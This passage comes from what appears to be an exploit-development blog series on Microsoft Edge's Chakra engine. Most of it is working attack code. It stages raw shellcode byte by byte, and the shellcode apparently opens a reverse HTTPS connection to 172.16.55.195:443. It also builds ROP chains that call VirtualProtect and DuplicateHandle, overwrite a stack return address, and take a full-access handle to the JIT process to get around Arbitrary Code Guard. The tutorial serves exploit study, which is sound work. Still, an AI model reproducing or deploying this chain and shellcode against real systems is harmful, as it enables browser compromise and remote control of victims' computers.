	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x0f020b18, 0x00007285);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x88808b00, 0x48000000);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x6774c085, 0x44d00148);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5020408b, 0x4918488b);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x56e3d001, 0x41c9ff48);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4d88348b, 0x0148c931);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc03148d6, 0x0dc9c141);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc10141ac, 0xf175e038);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x244c034c, 0xd1394508);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4458d875, 0x4924408b);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4166d001, 0x44480c8b);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x491c408b, 0x8b41d001);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x01488804, 0x415841d0);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5a595e58, 0x59415841);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x83485a41, 0x524120ec);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4158e0ff, 0x8b485a59);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xff4be912, 0x485dffff);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4953db31, 0x6e6977be);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x74656e69, 0x48564100);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc749e189, 0x26774cc2);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53d5ff07, 0xe1894853);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x314d5a53, 0xc9314dc0);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xba495353, 0xa779563a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x0ee8d5ff);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x31000000, 0x312e3237);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x35352e36, 0x3539312e);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89485a00, 0xc0c749c1);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x000001bb, 0x53c9314d);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53036a53, 0x8957ba49);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x0000c69f, 0xd5ff0000);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x000023e8, 0x2d652f00);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x65503754, 0x516f3242);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x58643452, 0x6b47336c);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x67377674, 0x4d576c79);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x3764757a, 0x0078466a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53c18948, 0x4d58415a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4853c931, 0x280200b8);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000084, 0x53535000);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xebc2c749, 0xff3b2e55);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc68948d5, 0x535f0a6a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xf189485a, 0x4dc9314d);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5353c931, 0x2dc2c749);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xff7b1806, 0x75c085d5);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc1c7481f, 0x00001388);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xf044ba49, 0x0000e035);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xd5ff0000, 0x74cfff48);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xe8cceb02, 0x00000055);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x406a5953, 0xd189495a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4910e2c1, 0x1000c0c7);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xba490000, 0xe553a458);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x9348d5ff);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89485353, 0xf18948e7);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x49da8948, 0x2000c0c7);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89490000, 0x12ba49f9);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00e28996, 0xff000000);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc48348d5, 0x74c08520);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x078b66b2, 0x85c30148);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x58d275c0, 0x006a58c3);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc2c74959, 0x56a2b5f0);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x0000d5ff);
	inc();

	// Store where our ROP chain begins
	ropBegin = countMe;

	// Increment countMe (which is the variable used to write 1 QWORD at a time) by 0x50 bytes to give us some breathing room between our shellcode and ROP chain
	countMe += 0x50;

	// VirtualProtect() ROP chain (will be called in the JIT process)
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x577fd4, chakraHigh);         // 0x180577fd4: pop rax ; ret
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x72E128, chakraHigh);         // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x46377, chakraHigh);          // 0x180046377: pop rcx ; ret
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x74e030, chakraHigh);         // PDWORD lpflOldProtect (any writable address -> Eventually placed in R9)
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0xf6270, chakraHigh);          // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x46377, chakraHigh);          // 0x180046377: pop rcx ; ret
    inc();

    // Store the current offset within the .data section into a var
    ropoffsetOne = countMe;

    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x00000000);                // LPVOID lpAddress (Eventually will be updated to the address we want to mark as RWX, our shellcode)
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x1d2c9, chakraHigh);          // 0x18001d2c9: pop rdx ; ret
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00001000, 0x00000000);                // SIZE_T dwSize (0x1000)
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000040, 0x00000000);                // DWORD flNewProtect (PAGE_EXECUTE_READWRITE)
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x577fd4, chakraHigh);         // 0x180577fd4: pop rax ; ret
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, kernelbaseLo+0x61700, kernelbaseHigh);  // KERNELBASE!VirtualProtect
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x272beb, chakraHigh);         // 0x180272beb: jmp rax (Call KERNELBASE!VirtualProtect)
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x118b9, chakraHigh);          // 0x1800118b9: add rsp, 0x18 ; ret
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x4c1b65, chakraHigh);         // 0x1804c1b65: pop rdi ; ret
    inc();

    // Store the current offset within the .data section into a var
    ropoffsetTwo = countMe;

    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x00000000);                // Will be updated with the VirtualAllocEx allocation (our shellcode)
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x1ef039, chakraHigh);         // 0x1801ef039: push rdi ; ret (Return into our shellcode)
    inc();

    // We can reliably traverse the stack 0x6000 bytes
    // Scan the stack for the return address below
    /*
    0:020> u chakra+0xd4a73
    chakra!Js::JavascriptFunction::CallFunction<1>+0x83:
    00007fff`3a454a73 488b5c2478      mov     rbx,qword ptr [rsp+78h]
    00007fff`3a454a78 4883c440        add     rsp,40h
    00007fff`3a454a7c 5f              pop     rdi
    00007fff`3a454a7d 5e              pop     rsi
    00007fff`3a454a7e 5d              pop     rbp
    00007fff`3a454a7f c3              ret
    */

    // Creating an array to store the return address because read64() returns an array of 2 32-bit values
    var returnAddress = new Uint32Array(0x4);
    returnAddress[0] = chakraLo + 0xd4a73;
    returnAddress[1] = chakraHigh;

	// Counter variable
	let counter = 0x6000;

	// Loop
	while (counter != 0)
	{
	    // Store the contents of the stack
	    tempContents = read64(stackleakPointer[0]+counter, stackleakPointer[1]);

	    // Did we find our target return address?
        if ((tempContents[0] == returnAddress[0]) && (tempContents[1] == returnAddress[1]))
        {
			document.write("[+] Found our return address on the stack!");
            document.write("<br>");
            document.write("[+] Target stack address: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]+counter));
            document.write("<br>");

            // Break the loop
            break;

        }
        else
        {
        	// Decrement the counter
	    	// This is because the leaked stack address is near the stack base so we need to traverse backwards towards the stack limit
	    	counter -= 0x8;
        }
	}

	// alert() for debugging
	alert("DEBUG");

	// Corrupt the return address to control RIP with 0x4141414141414141
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);
}
</script>

Before I explain the reasoning behind the ROP chain, let me say just two things:

  1. Notice that we incremented countMe by 0x50 bytes after we wrote our shellcode. This is to ensure that our ROP chain and shellcode don’t collide and we have a noticeable gap between them, so we can differentiate where the shellcode stops and the ROP chain begins
  2. You can generate ROP gadgets for chakra.dll with the rp++ utility leveraged in the first blog post. Here is the command: rp-win-x64.exe -f C:\Windows\system32\chakra.dll -r 5 > C:\PATH\WHERE\YOU\WANT\TO\STORE\ROP\GADGETS\FILENAME.txt. Again, this is outlined in part two. You will then have a list of ROP gadgets from chakra.dll.
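To make the layout of the staging area a bit more concrete, here is a minimal sketch (not part of the exploit itself) of how raw shellcode bytes map onto the two 32-bit halves that each write64() call above takes, and of where the ROP chain lands once the 0x50-byte gap is added. The helper names packQwords and ropChainOffset are made up for illustration, and the 16 bytes used are simply the first two QWORDs of the shellcode listing read back in little-endian order.

```javascript
// Pack a byte array into [lo, hi] 32-bit pairs, one pair per QWORD (little-endian).
// This is the same shape as the last two arguments of the write64() calls above.
function packQwords(bytes) {
    const padded = bytes.slice();
    while (padded.length % 8 !== 0) padded.push(0x00);   // zero-pad the final QWORD

    const pairs = [];
    for (let i = 0; i < padded.length; i += 8) {
        const view = new DataView(Uint8Array.from(padded.slice(i, i + 8)).buffer);
        pairs.push([view.getUint32(0, true), view.getUint32(4, true)]);
    }
    return pairs;
}

// Byte offset (from the start of the staging area) at which the ROP chain begins:
// one QWORD per shellcode write, plus the breathing room added to countMe.
function ropChainOffset(shellcodeQwords, gap) {
    return shellcodeQwords * 8 + gap;
}

// First 16 bytes of the shellcode, taken from the first two write64() calls
const firstBytes = [0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xcc, 0x00,
                    0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51];

for (const [lo, hi] of packQwords(firstBytes)) {
    console.log("0x" + lo.toString(16).padStart(8, "0") + ", 0x" + hi.toString(16).padStart(8, "0"));
}

// With only these two QWORDs staged, the chain would start 0x60 bytes in
console.log("ROP chain offset: 0x" + ropChainOffset(2, 0x50).toString(16));
```

The two printed pairs match the value arguments of the first two write64() calls in the shellcode listing, which is a quick way to sanity-check a packing script before pasting its output into the exploit.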

Now, let’s explain this ROP chain.

This ROP chain will not be executed anytime soon, nor will it be executed within the content process (where the exploit is being detonated). Instead, this ROP chain and our shellcode will be injected into the JIT process (where ACG is disabled). From there we will hijack execution of the JIT process and force it to execute our ROP chain. The ROP chain (when executed) will:

  1. Set up a call to VirtualProtect and mark our shellcode allocation as RWX
  2. Jump to our shellcode and execute it

Again, this is all done within the JIT process. Another remark on the ROP chain - we can notice a few interesting things, such as the lpAddress parameter. According to the documentation of VirtualProtect this parameter:

The address of the starting page of the region of pages whose access protection attributes are to be changed.

So, based on our exploitation plan, we know that this lpAddress parameter will be the address of our shellcode allocation, once it is injected into the JIT process. The dilemma is that, at this point in the exploit (when our ROP chain and shellcode are being stored in the content process), we have not yet injected any shellcode into the JIT process. There is therefore no way to fill this parameter with a correct value right now, as we have yet to call VirtualAllocEx to actually inject the shellcode into the JIT process. Because of this, we set up our ROP chain as follows:

(...)truncated(...)

write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x46377, chakraHigh);          // 0x180046377: pop rcx ; ret
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x00000000);                // LPVOID lpAddress (Eventually will be updated to the address we want to mark as RWX, our shellcode)
inc();

According to the __fastcall calling convention, the lpAddress parameter needs to be stored in the RCX register. However, we can see our ROP chain, as it currently stands, will only pop the value of 0 into RCX. We know, however, that we need the address of our shellcode to be placed here. Let me explain how we will reconcile this (we will step through all of this code when the time comes, but for now I just want to make this clear to the reader as to why our final ROP chain is only partially completed at the current moment).

  1. We will use VirtualAllocEx and WriteProcessMemory to allocate and write our shellcode into the JIT process with our first few ROP chains of our exploit.
  2. VirtualAllocEx will return the address of our shellcode within the JIT process
  3. When VirtualAllocEx returns the address of the remote allocation within the JIT process, we will use a call to WriteProcessMemory to write the actual address of our shellcode in the JIT process (which we now have because we injected it with VirtualAllocEx) into our final ROP chain (which currently is using a “blank placeholder” for lpAddress).
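The placeholder idea in the steps above can be modeled in a few lines. This is only a toy sketch under stated assumptions: the chain is a plain JavaScript array instead of memory in chakra.dll, patch() stands in for the later WriteProcessMemory call, the chain is abbreviated to the gadgets around the two placeholders, and the "remote" address is a made-up value, not something VirtualAllocEx actually returned.

```javascript
// Toy model: the staged chain is an array of QWORDs (BigInt), one entry per write64().
const chain = [];
const placeholders = {};          // name -> byte offset of the slot inside the chain

function push(value) {
    chain.push(BigInt(value));
}

// Write a zeroed slot now and remember where it lives so it can be patched later.
function reserve(name) {
    placeholders[name] = chain.length * 8;
    chain.push(0n);
}

// Stand-in for the later WriteProcessMemory call that fills in a slot.
function patch(name, value) {
    chain[placeholders[name] / 8] = BigInt(value);
}

push(0x180046377n);               // pop rcx ; ret (unrebased address from the gadget comments)
reserve("lpAddress");             // plays the role of ropoffsetOne
push(0x1804c1b65n);               // pop rdi ; ret
reserve("shellcodeReturn");       // plays the role of ropoffsetTwo
push(0x1801ef039n);               // push rdi ; ret

// Hypothetical value standing in for whatever VirtualAllocEx will return
const remoteShellcode = 0x000001f000000000n;
patch("lpAddress", remoteShellcode);
patch("shellcodeReturn", remoteShellcode);

console.log(chain.map(q => "0x" + q.toString(16).padStart(16, "0")));
```

Recording the offset at the moment the placeholder is written is the important part, since it is the only way to find the slot again once dozens of other QWORDs have been staged around it.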

Lastly, we know that our final ROP chain (the one we are storing and updating with the aforesaid steps) not only marks our shellcode as RWX, but it is also responsible for returning into our shellcode. This can be seen in the below snippet of the VirtualProtect ROP chain.

(...)truncated(...)

write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x4c1b65, chakraHigh);         // 0x1804c1b65: pop rdi ; ret
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x00000000);                // Will be updated with the VirtualAllocEx allocation (our shellcode)
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x1ef039, chakraHigh);         // 0x1801ef039: push rdi ; ret (Return into our shellcode)

Again, we are currently using a blank “parameter placeholder” in this case, as our VirtualProtect ROP chain doesn’t know where our shellcode was injected into the JIT process (as it hasn’t happened at this point in the exploitation process). We will be updating this eventually. For now, let me summarize briefly what we are doing:

  1. Storing shellcode + VirtualProtect ROP chain within the .data section of chakra.dll (in the content process, for now)
  2. These items will eventually be injected into the JIT process (where ACG is disabled).
  3. We will hijack control-flow execution in the JIT process to force it to execute our ROP chain. Our ROP chain will mark our shellcode as RWX and jump to it
  4. Lastly, our ROP chain is missing some information, as the shellcode hasn’t been injected yet. This information will be reconciled by the “long” ROP chains that we are about to embark on in the next few sections of this blog post. So, for now, the “final” VirtualProtect ROP chain has some missing information, which we will reconcile on the fly.

Lastly, before moving on, let’s see what our shellcode and ROP chain look like after we execute our exploit (as it currently is).

After executing the script, we can then (before we close the dialogue) attach WinDbg to the content process and examine chakra_base + 0x74b000 to see if everything was written properly.

As we can see, we have successfully stored our shellcode and ROP chain (which will be executed in the future).

Let’s now start working on our exploit in order to achieve execution of our final ROP chain and shellcode.

DuplicateHandle ROP Chain

Before we begin, each ROP gadget I write has an associated comment. My blog will sometimes cut these off when I paste a code snippet, and you might be required to slide the bar under the code snippet to the right to see comments.

We have, as we have seen, already prepared what we are eventually going to execute within the JIT process. However, we still have to figure out how we are going to inject these items into the JIT process and begin code execution. The journey to this goal begins with our overwritten return address, which hijacks control flow and starts our ROP chain (just like in part two of this blog series). However, instead of directly executing a ROP chain to call WinExec, we will be chaining together multiple ROP chains in order to achieve this goal. Everything that happens in our exploit now happens in the content process (for the foreseeable future).

A caveat before we begin. Everything, from here on out, will begin at these lines of our exploit:

// alert() for debugging
alert("DEBUG");

// Corrupt the return address to control RIP with 0x4141414141414141
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);

We will start writing our ROP chain where the Corrupt the return address to control RIP with 0x4141414141414141 comment is (just like in part two). Additionally, we are going to truncate (from here on out, until our final code) everything that comes before our alert() call. This is to save space in this blog post, and it is the same thing we did in part two. So again, nothing that comes before the alert() statement will be changed. Let’s begin now.

As previously mentioned, it is possible to obtain a PROCESS_ALL_ACCESS handle to the JIT server by abusing the PROCESS_DUP_HANDLE handle stored in s_jitManager. Using our stack control, we know the next goal is to instrument a ROP chain. Although we will be leveraging multiple chained ROP chains, our process begins with a call to DuplicateHandle - in order to retrieve a privileged handle to the JIT server. This will allow us to compromise the JIT server, where ACG is disabled. This call to DuplicateHandle will be as follows:

DuplicateHandle(
	jitHandle,		// Leaked from s_jitManager+0x8 with PROCESS_DUP_HANDLE permissions
	GetCurrentProcess(),	// Pseudo handle to the current process
	GetCurrentProcess(),	// Pseudo handle to the current process
	&fulljitHandle,		// Variable we supply that will receive the PROCESS_ALL_ACCESS handle to the JIT server
	0,			// NULL since we will set dwOptions to DUPLICATE_SAME_ACCESS
	0,			// FALSE (new handle isn't inherited)
	DUPLICATE_SAME_ACCESS	// Duplicate handle has same access as source handle (source handle is an all access handle, e.g. a pseudo handle), meaning the duplicated handle will be PROCESS_ALL_ACCESS
);
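To illustrate why this particular combination of arguments yields a full-access handle, here is a toy model of the semantics the call relies on. It is a sketch, not how Windows implements handle duplication: duplicateHandleModel and the object shapes are invented for illustration, and the only real values are the constants, which come from the Windows SDK headers. The key assumption, taken from the comments in the call above, is that the (HANDLE)-1 pseudo-handle is resolved in the context of the source process (the JIT server) and carries PROCESS_ALL_ACCESS.

```javascript
// Access-right and option values from the Windows SDK headers
const PROCESS_DUP_HANDLE    = 0x0040;
const PROCESS_ALL_ACCESS    = 0x1FFFFF;
const DUPLICATE_SAME_ACCESS = 0x2;
const CURRENT_PROCESS       = -1;      // pseudo-handle, (HANDLE)-1

// Toy model. sourceProcess is { name, handles: { value: { target, access } } } and
// sourceProcessAccess is the access mask of the caller's handle to that process.
function duplicateHandleModel(sourceProcessAccess, sourceProcess, sourceHandle, desiredAccess, options) {
    // The caller's handle to the source process must allow handle duplication
    if ((sourceProcessAccess & PROCESS_DUP_HANDLE) === 0) {
        throw new Error("source process handle lacks PROCESS_DUP_HANDLE");
    }

    // The pseudo-handle is interpreted relative to the source process, not the caller
    const resolved = (sourceHandle === CURRENT_PROCESS)
        ? { target: sourceProcess.name, access: PROCESS_ALL_ACCESS }
        : sourceProcess.handles[sourceHandle];

    // DUPLICATE_SAME_ACCESS ignores desiredAccess and copies the source handle's access
    const access = (options & DUPLICATE_SAME_ACCESS) ? resolved.access : desiredAccess;
    return { target: resolved.target, access: access };
}

const jitProcess = { name: "JIT server", handles: {} };
const fullJitHandle = duplicateHandleModel(
    PROCESS_DUP_HANDLE, jitProcess, CURRENT_PROCESS, 0, DUPLICATE_SAME_ACCESS);

console.log(fullJitHandle.target, "0x" + fullJitHandle.access.toString(16));
```

In other words, the limited PROCESS_DUP_HANDLE handle is only used as the "source process" argument; the handle that actually gets duplicated is the JIT server's own view of itself.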

With this in mind, here is how the function call will be set up via ROP:

// alert() for debugging
alert("DEBUG");

// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager::s_jitManager+0x8)
jitHandle = read64(chakraLo+0x74d838, chakraHigh);

// Helper function to be called after each stack write to increment offset to be written to
function next()
{
    counter+=0x8;
}

// Begin ROP chain
// Since __fastcall requires parameters 5 and so on to be at RSP+0x20, we actually have to put them at RSP+0x28
// This is because we don't push a return address on the stack, as we don't "call" our APIs, we jump into them
// Because of this we have to compensate by starting them at RSP+0x28 since we can't count on a return address to push them there for us

// DuplicateHandle() ROP chain
// Stage 1 -> Abuse PROCESS_DUP_HANDLE handle to JIT server by performing DuplicateHandle() to get a handle to the JIT server with full permissions
// ACG is disabled in the JIT process
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1299

// Writing our ROP chain to the stack, stack+0x8, stack+0x10, etc. after return address overwrite to hijack control-flow transfer

// HANDLE hSourceProcessHandle (RCX) _should_ come first. However, we are configuring this parameter towards the end, as we need RCX for the lpTargetHandle parameter

// HANDLE hSourceHandle (RDX)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Pseudo-handle to current process
next();

// HANDLE hTargetProcessHandle (R8)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPHANDLE lpTargetHandle (R9)
// This needs to be a writable address where the full JIT handle will be stored
// Using .data section of chakra.dll in a part where there is no data
/*
0:053> dqs chakra+0x72E000+0x20010
00007ffc`052ae010  00000000`00000000
00007ffc`052ae018  00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72e128, chakraHigh);      // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server;
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hSourceProcessHandle (RCX)
// Handle to the JIT process from the content process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], jitHandle[0], jitHandle[1]);         // PROCESS_DUP_HANDLE HANDLE to JIT server
next();

// Call KERNELBASE!DuplicateHandle
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)
next();

Before stepping through our ROP chain, notice the first thing we do is read the JIT server handle:

// alert() for debugging
alert("DEBUG");

// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager::s_jitManager+0x8)
jitHandle = read64(chakraLo+0x74d838, chakraHigh);

